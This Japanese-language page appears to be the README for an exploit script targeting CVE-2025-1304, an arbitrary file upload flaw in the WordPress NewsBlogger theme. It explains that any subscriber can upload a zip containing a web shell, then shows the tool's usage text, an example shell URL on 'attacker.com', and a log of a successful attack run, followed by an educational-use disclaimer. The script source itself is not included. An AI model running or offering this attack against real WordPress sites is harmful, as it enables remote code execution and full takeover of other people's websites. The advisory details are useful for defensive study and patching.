
WordPress NewsBlogger Theme <= 0.2.5.1 には任意のファイルアップロードの脆弱性があります。
CVSSスコア: 8.8 (高)
脆弱性タイプ: 任意ファイルアップロード
コンポーネント: WordPressテーマ
CVE ID: CVE-2025-1304
NewsBlogger WordPressテーマ(バージョン <= 0.2.5.1)には、管理画面のウェルカムパネルを介した任意ファイルアップロードの脆弱性が存在します。
この脆弱性により、最小権限の**購読者(Subscriber)**ロールを含む、認証されたすべてのユーザーが、Webシェルを含む悪意のある.zipアーカイブをアップロードできます。
このアップロードは、検証されていないプラグインURLフィールドを介して行われ、アップロードされたファイルの内容や種類を適切に検証しません。
攻撃が成功すると、リモートコード実行や権限昇格を含む、Webサイトの完全な乗っ取りにつながる可能性があります。
このPythonスクリプトは、以下の方法で脆弱性の悪用を自動化します:
nonceを動的に抽出します。python CVE-2025-1304.py -h
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB
WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )
options:
-h, --help show this help message and exit
--url, -u URL Target base URL (e.g., http://target/wordpress)
--username, -un USERNAME WordPress admin username
--password, -p PASSWORD WordPress admin password
--shellweb, -shell SHELLWEB
Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}
このコードは、教育目的および許可されたセキュリティテストの目的でのみ提供されます。
作者は、このツールの誤用またはそれによって引き起こされた損害について一切の責任を負いません。
作者: Nxploited ( Khaled Alenazi )